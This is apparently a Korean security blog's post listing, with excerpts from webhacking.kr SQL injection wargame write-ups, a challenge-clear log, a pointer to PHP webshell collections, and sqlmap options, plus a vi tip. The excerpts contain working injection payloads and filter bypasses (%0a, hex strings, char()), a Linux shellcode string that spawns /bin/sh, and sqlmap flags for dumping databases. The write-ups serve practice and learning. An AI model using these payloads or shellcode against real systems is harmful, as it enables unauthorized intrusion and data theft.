연습 또 연습.

파라미터는 no, id, pw이다. 폼을 통해 제출하는 파라미터는 no이다.이 문제는 소스를 안 보여준다. 쿼리를 유추해야 하는데, 여러 가지 해보면서 유추해보면select * from ~ where no={$_GET[no]} or id='{$_GET[id]}' and pw='{$_GET[pw]}'이다. no가 1 일 때 guest/guest이고no가 2 일 떄 admin/???? 이다.admin의 패스워드를 알아내야 한다. 우선 length함수로 길이를 뽑아낸다.?no=2 and length(pw)=19 이제 한 글자씩 뽑는다.mid(pw,1,1)ord(mid(pw,1,1))이런 식으로 아스키 범위에서 알아내면 되는데, 너무 오래걸린다. (아스키범위 32~127)이진수로 뽑으면 한 글자당 7회의 쿼리만..

46번과 매우 흡사하다. 필터링만 늘었다.괄호를 못 써서 char함수를 못 쓴다.대신 필터링에서 0x가 빠져서 id=0x61646d696e로 우회가 가능하다.or는 ||로 우회해준다. ?lv=2||id=0x61646d696e

쿼리 select id,cash from members where lv=$_GET[lv] lv=1만 반응한다. 곧+--------+-----+---+| id | cash | lv |+--------+-----+---+| zzibong | 10000 | 1 |+--------+-----+---+ id를 admin으로 만들어야하므로?lv=0 or id='admin' 공백은 %0a로, 쿼터는 char함수로 우회해준다. (0x도 필터링됨) ?lv=0%0aor%0aid=char(97,100,109,105,110)

쿼리select id from challenge18_table where id='guest' and no=$_GET[no] guest의 no값은 1이다. admin으로 로그인해아하는데 추정할 수 있는 table의 형태는 +-----+---+| id | no |+-----+---+| guest | 1 || admin | 2 |+-----+---+ no=0 or no=2를 주면 되는데 공백이 필터링된다 깔끔하게 %0a로 우회해준다. ?no=0%0aor%0ano=2

webhacking.kr SQL Injection 문제 3/28 시작 2 (500)7 (300) - 4/9 클리어8 (350) - 4/1 클리어9 (900) - 7/17 클리어13 (1000) - 8/22 클리어18 (100) - 3/28 클리어21 (250) - 3/28 클리어22 (500) - 8/23 클리어35 (350) - 3/31 클리어40 (500) - 3/31 클리어45 (550) - 4/3 클리어46 (300) - 3/28 클리어49 (300) - 3/28 클리어50 (450) - 3/29 클리어51 (250) - 4/3 클리어53 (350) - 3/31 클리어55 (400) - 4/9 클리어56 (250) - 3/31 클리어57 (600) - 4/3 클리어59 (200) - 7/8 클리어

웹쉘 모음 https://github.com/tennc/webshell/tree/master/php WSO, WPES 쓸만한듯...

http://blog.naver.com/sthellfire/220642140398 쉘코드\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80

http://huammmm1.tistory.com/502

옵션설명 -h : 도움말-hh : 상세도움말 $ python sqlmap.py -u "https://test.com/index.php" --data="id=a&pw=a" -p "pw" --random-agent --dbms=mysql --level=5 --risk=3 --threads=10 -u : URL--data : post로 넘길 때-p : 공격할 parameter--random-agent : user-agent 넣고 실행--level--dbms=mysql : dbms설정--threads : 쓰레드 설정 (속도) --dbs : DB리스트 캐내기 (Enumerate)--tables : table 리스트 캐내기--columns : 컬럼 캐내기 -D "c9" : DB지정-T "guestbook" : 테이..

vi에서 블록 설정하기 v를 누르면 visual모드가 된다 !V는 줄 단위 블록처리 이 상태에서.... (0) > : > 를 하면 단체 들여쓰기(1) y : y는 복사 (yank : 확 잡아땡긴다)(2) p : p는 붙여넣기 (put, paste)(3) d : 지우기블록 친 상태에서d를 누르면 지워진다. 그리고, 블록 친 상태에서 =를 누르면 자동 들여쓰기가 된다 !!esc를 누르고 gg=G를 누르면 전체 자동 들여쓰기.